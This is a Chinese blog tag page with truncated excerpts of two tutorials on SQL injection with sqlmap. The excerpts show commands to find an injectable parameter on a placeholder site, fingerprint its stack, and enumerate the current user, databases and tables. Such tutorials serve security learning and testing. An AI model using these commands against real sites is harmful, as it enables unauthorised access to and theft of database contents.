• 欢迎访问金笔头博客,这是一个菜鸟(伪)程序员的自留地,欢迎访问我的github:点击进入

标签:web安全

信息安全

Sql Injection and Dump The Data

Sql Injection and Dump The Data
1.检测注入点是否可用root@kali:~/Desktop# sqlmap -u http://www.xxoo.com/assist/index.php?id=20参数:-u:指定注入点url探测结果可知:(1)注入参数id为GET注入,注入类型为UNION query(2)web应用程序技术为PHP5.6.9(3)数据库类型为MyS……继续阅读 »

2年前 (2015-12-14) 1633浏览

信息安全

sqlmap常用参数

sqlmap常用参数
#获取当前用户名称 sqlmap -u "http://url?id=1" --current-user #获取当前数据库名称sqlmap -u "http://url?id=1" --current-db #列出给定数据库的所有表sqlmap -u "http://url?id=1" -D "db_name" --tables #列出指定……继续阅读 »

2年前 (2015-12-13) 2809浏览